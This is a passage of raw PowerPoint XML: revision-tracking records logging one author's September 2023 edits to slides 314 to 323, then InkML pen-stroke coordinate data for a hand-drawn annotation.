          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:40:15.353" v="9020" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:spMk id="13" creationId="{DC38BA87-A7F0-F2E4-739A-949CEF21502C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T02:18:06.949" v="9046" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:spMk id="14" creationId="{0A934CF6-CA5D-C49A-1528-F653C3434E21}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:36:09.557" v="8958" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:spMk id="30" creationId="{7C04EBD3-DDF5-BEDC-7B70-A5528F60A0F0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:36:08.156" v="8957" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:spMk id="31" creationId="{B39B77C2-31E8-07D6-EF84-921A601D466E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:36:06.156" v="8956" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:spMk id="32" creationId="{6843102A-F51B-CAD4-C30E-44740071002F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:36:11.397" v="8959" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:spMk id="33" creationId="{AB1C8965-531B-ADFA-9F90-55EB18750511}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:36:12.765" v="8960" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:spMk id="34" creationId="{93A18B92-965A-6F03-FBAB-1D92989E135F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:36:15.667" v="8961" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:picMk id="29" creationId="{9072A050-BB75-3452-CF8E-D395C4BFB7F0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T00:27:10.082" v="9459" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:picMk id="1028" creationId="{4B840082-2704-503A-456D-002C6BA66E26}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T00:14:02.119" v="9068" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:cxnSpMk id="18" creationId="{C6D96C4E-08D3-214C-437D-EBC03326DE9C}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T00:14:02.509" v="9069" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:cxnSpMk id="20" creationId="{6C85CEB8-D50C-CCD1-1786-25B00DFE0FCB}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T00:14:02.949" v="9070" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:cxnSpMk id="22" creationId="{1ECCF361-6E38-594D-1C73-A4EE72C8F79D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T00:14:03.645" v="9071" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:cxnSpMk id="25" creationId="{5862B978-9EDC-1B23-3786-94547B474061}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T00:29:42.799" v="9583" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4062437377" sldId="315"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T00:29:18.666" v="9525" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4062437377" sldId="315"/>
            <ac:spMk id="2" creationId="{29000054-B7A4-7B0B-7CB2-1E48514EE7D5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T00:29:42.799" v="9583" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4062437377" sldId="315"/>
            <ac:spMk id="3" creationId="{EC475928-A100-3D22-F805-72F3F96DB982}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:28:29.589" v="10049" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4207949516" sldId="316"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:27:08.452" v="10001" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4207949516" sldId="316"/>
            <ac:spMk id="2" creationId="{E186BD0E-04D5-C941-D4D8-AECE446D04BF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:27:08.452" v="10001" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4207949516" sldId="316"/>
            <ac:spMk id="3" creationId="{EEE09D7E-3892-0DBB-195D-B4AA3C2954EC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:28:29.589" v="10049" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4207949516" sldId="316"/>
            <ac:spMk id="6" creationId="{E56279BA-E5A5-D769-2969-8EA7C6759DD5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:27:43.970" v="10002" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4207949516" sldId="316"/>
            <ac:picMk id="5" creationId="{74827BF5-1AF2-8FC2-2A5B-0A0209FCB84A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:48:00.934" v="10238" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2518566447" sldId="317"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:35:08.076" v="10095" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2518566447" sldId="317"/>
            <ac:spMk id="3" creationId="{22935D0E-C3EB-A97A-6517-932D657C66ED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:35:26.755" v="10110"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2518566447" sldId="317"/>
            <ac:spMk id="4" creationId="{452CFB53-0957-73D2-510B-3A1C8BC14664}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:38:54.738" v="10137" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2518566447" sldId="317"/>
            <ac:spMk id="5" creationId="{AFCDBA9F-3C09-2B8D-9A7D-AA16638A612E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:48:00.934" v="10238" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2518566447" sldId="317"/>
            <ac:spMk id="8" creationId="{464401FB-7071-45B3-A233-CE5F026F15BF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:47:45.799" v="10229" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2518566447" sldId="317"/>
            <ac:picMk id="7" creationId="{A4E76DDA-42A4-8578-D7B0-CC314269911E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:38:54.738" v="10137" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2518566447" sldId="317"/>
            <ac:picMk id="1026" creationId="{10F96C7E-CEC0-3012-596D-6EE010E09E26}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:52:52.816" v="10427" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="333316341" sldId="318"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:51:55.786" v="10342" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="333316341" sldId="318"/>
            <ac:spMk id="2" creationId="{76A93339-A03E-5714-6354-C906316F75DC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:52:52.816" v="10427" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="333316341" sldId="318"/>
            <ac:spMk id="3" creationId="{C480097D-976A-F95F-7A03-5170B2495F95}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:23:31.761" v="11191" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2629662435" sldId="319"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:23:31.761" v="11191" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2629662435" sldId="319"/>
            <ac:spMk id="2" creationId="{77B7817D-88F9-C62B-2D53-D89562359451}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T02:01:22.896" v="10679" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2629662435" sldId="319"/>
            <ac:spMk id="4" creationId="{0F5A6AD9-5547-97B7-0E92-7331261D0243}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T02:01:34.550" v="10687" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2629662435" sldId="319"/>
            <ac:spMk id="6" creationId="{4EFDAD2B-9201-0761-B748-AC8EBDBE4B19}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T02:00:08.172" v="10646" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2629662435" sldId="319"/>
            <ac:picMk id="3" creationId="{1A512D91-1BB6-6634-DEE2-BB1D3DE95B95}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:54:14.119" v="10490" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2629662435" sldId="319"/>
            <ac:picMk id="5" creationId="{2C95933F-3E2A-F09B-111D-0ACF6A870B7E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:25:07.326" v="11203" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1999514303" sldId="320"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T14:09:10.219" v="10801" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1999514303" sldId="320"/>
            <ac:spMk id="2" creationId="{6AD34D84-C753-90AE-42B6-F6F9BEF86C8A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T14:09:10.219" v="10801" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1999514303" sldId="320"/>
            <ac:spMk id="3" creationId="{C0F1AAC7-4A30-459E-A7CF-A6C2D43DAEE9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:23:40.369" v="11192"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1999514303" sldId="320"/>
            <ac:spMk id="4" creationId="{7732CA0C-8DE4-47CF-7117-997C0348425B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:25:07.326" v="11203" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1999514303" sldId="320"/>
            <ac:spMk id="5" creationId="{08C6899F-B7AB-7642-86A9-2CADC2D8B2F5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T14:08:05.284" v="10799" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3550744436" sldId="320"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:25:55.176" v="11224" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="217760891" sldId="321"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:25:55.176" v="11224" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="217760891" sldId="321"/>
            <ac:spMk id="2" creationId="{77659EAF-FF58-861F-352B-5B435F4C963F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:25:49.657" v="11204" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="217760891" sldId="321"/>
            <ac:spMk id="3" creationId="{123AAAAB-4DEA-AA3A-7E35-0ED7F9756EF1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:36:32.050" v="11290" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3415566281" sldId="322"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:34:57.422" v="11236" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3415566281" sldId="322"/>
            <ac:spMk id="3" creationId="{3CD63AE9-6C52-6BFE-ED53-1A230E8766ED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:36:32.050" v="11290" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3415566281" sldId="322"/>
            <ac:spMk id="5" creationId="{39655F92-8969-4AD1-1D40-8385A4542A2C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:35:00.673" v="11238" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3415566281" sldId="322"/>
            <ac:picMk id="1026" creationId="{E5C5ADB7-9A3A-0395-DA8A-A41EEC423B7B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:40:48.779" v="11338" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2972952555" sldId="323"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:38:01.022" v="11300" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2972952555" sldId="323"/>
            <ac:spMk id="2" creationId="{6C8E5572-F121-4516-AFA7-E780C5C876C5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:40:48.779" v="11338" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2972952555" sldId="323"/>
            <ac:spMk id="3" creationId="{90C7E6BB-78A7-9532-6AC7-17B220B92B6C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:37:53.220" v="11292" actId="680"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="608637589" sldId="32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36.774"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">697 0 24575,'-14'1'0,"-1"1"0,1 0 0,-1 1 0,1 0 0,0 1 0,0 1 0,1 0 0,-1 1 0,-14 9 0,15-9 0,-5 3 0,6-4 0,0 0 0,0 2 0,1-1 0,0 1 0,0 1 0,-10 9 0,7-3 0,4-4 0,1 0 0,-2-1 0,1 0 0,-1-1 0,0 0 0,-1-1 0,1 0 0,-2-1 0,-15 6 0,17-9 0,1 1 0,0 0 0,0 0 0,1 1 0,-1 0 0,1 1 0,0 0 0,0 0 0,1 1 0,0 0 0,0 1 0,1 0 0,0 0 0,0 0 0,-6 10 0,-16 20 0,23-31 0,-1 0 0,1 1 0,1 0 0,-1 0 0,1 0 0,1 0 0,0 1 0,0 0 0,0 0 0,1 0 0,1 0 0,-3 11 0,1 9 0,-14 48 0,12-53 0,0-1 0,2 1 0,-3 37 0,6-30 0,4 133 0,-1-148 0,1-1 0,1 0 0,8 23 0,-6-24 0,-2-1 0,0 1 0,-1 0 0,3 21 0,-6-29 0,0 0 0,1 0 0,0 0 0,0 0 0,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1-1 0,0 0 0,7 10 0,-2-6 0,1-1 0,0 0 0,0 0 0,1-1 0,15 9 0,112 86 0,-72-56 0,-42-28 0,43 24 0,1-10 0,1-2 0,1-4 0,119 29 0,-28-12 0,-92-25 0,94 11 0,-129-25 0,0-2 0,0-1 0,41-4 0,-67 2 0,0-1 0,0 1 0,0-1 0,-1-1 0,1 1 0,-1-1 0,0 0 0,7-5 0,47-35 0,-29 19 0,87-45 0,-112 64 0,0-1 0,0 0 0,0 0 0,-1-1 0,0 1 0,0-1 0,-1-1 0,1 1 0,-2 0 0,1-1 0,2-9 0,0 4 0,0 1 0,12-20 0,13-26 0,-14 25 0,29-43 0,-30 53 0,-2-1 0,-1 0 0,0 0 0,11-35 0,6-15 0,-23 61 0,-1 1 0,0-2 0,-2 1 0,1-1 0,-2 1 0,5-29 0,-5 17 0,0 1 0,12-38 0,-9 41 0,-1 0 0,0-1 0,1-42 0,-5 8 0,-4-84 0,2 129 0,-2 0 0,1 0 0,-2 1 0,1-1 0,-8-13 0,-3-11 0,13 32 0,0 1 0,0 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,-5 0 0,-4-2 0,0 2 0,0 0 0,-15-2 0,17 3 0,0 0 0,0 0 0,0-1 0,-16-6 0,13 3 6,0 1-1,0 0 0,-1 1 0,1 0 1,-1 1-1,-18-1 0,-81 